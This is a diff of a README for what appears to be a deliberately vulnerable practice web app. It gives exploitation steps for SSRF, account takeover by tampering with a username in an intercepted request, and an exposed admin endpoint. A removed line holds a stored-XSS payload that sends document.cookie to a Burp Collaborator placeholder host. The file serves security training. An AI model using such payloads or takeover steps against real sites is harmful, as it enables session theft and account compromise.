abhhi-101/simple_application/README.md

 3. **Server-side request forgery (SSRF)**
 - Get authenticated and go to the image download page.
-- Enter the below URL in the URL field and submit to induce a request on behalf of the server that will reset the application database. http://localhost:3000/reset
+- Enter the given URL in the input field and submit to induce a request on behalf of the server to reset the database. http://localhost:3000/reset

-4. **Account takeover via Stored XSS**
+4. **Account takeover via Improper Input Validation**
+- Get authenticated and go to the change password page.
+- Enter a password in the input field and submit while intercepting the request in Burp.
+- Replace the username with target's username in the POST data.
-- Go to the registration page and create a user with the below username `<script>var i=new Image;i.src="http://<BURP-COLLABORATOR-PAYLOAD>/?"+document.cookie;</script>`
+- Send the request to change the password of the target user and login with the new credentials.
-- Wait for the admin to login and access all user's data.
-- Once done, get admin's session ID in Burp collaborator client.
-- Get authenticated and replace the session ID with admin's using the Storage tab in the browser dev tools.
-- Refresh the page to get a session as the admin.

 5. **Information disclosure via direct endpoint**
-- Send a POST request to the below endpoint to get the data of all the users. http://localhost:3000/admin/users
+- Send a POST request to the given endpoint to fetch the data of all the users. http://localhost:3000/admin/users